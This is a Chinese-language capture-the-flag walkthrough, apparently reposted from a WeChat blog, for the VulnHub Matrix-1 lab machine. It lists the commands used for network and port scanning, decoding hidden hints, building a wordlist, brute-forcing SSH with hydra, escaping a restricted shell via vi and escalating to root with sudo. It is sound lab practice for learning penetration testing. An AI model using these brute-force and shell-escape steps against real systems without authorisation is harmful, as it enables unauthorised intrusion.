本周实践的是vulnhub的Matrix-1镜像,
下载地址,https://download.vulnhub.com/matrix/Machine_Matrix.zip,
用virtualbox导入成功,
做地址扫描,sudo netdiscover -r 192.168.0.0/24,
获取到靶机地址是192.168.0.188,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.188,
发现靶机开了22端口的ssh服务、80和31337端口的http服务,
浏览器访问http://192.168.0.188:31337,在源码里发现base64编码,
解码echo "ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=" | base64 -d,
获取到Cypher.matrix,
下载wget http://192.168.0.188:31337/Cypher.matrix,
查看内容,cat Cypher.matrix,获取到brainfuck编码,
解码,获取到用户名密码guest/k1ll0rXX,
制作密码字典,crunch 8 8 -t k1ll0r%@ -o dict.txt,
对ssh服务进行密码暴破,
hydra -l guest -P dict.txt 192.168.0.188 ssh,
获取到密码k1ll0r7n,
登录靶机ssh [email protected],发现是rbash,
一顿操作逃逸到普通shell,
$PATH
/home/guest/prog
echo /home/guest/prog/*
echo $SHELL
vi
:!/bin/bash
export SHELL=/bin/bash:$SHELL
export PATH=/usr/bin:$PATH
sudo -l确认有sudo权限,
export PATH=/bin:$PATH
切换到root,sudo su,id确认没问题,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Matrix-1的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论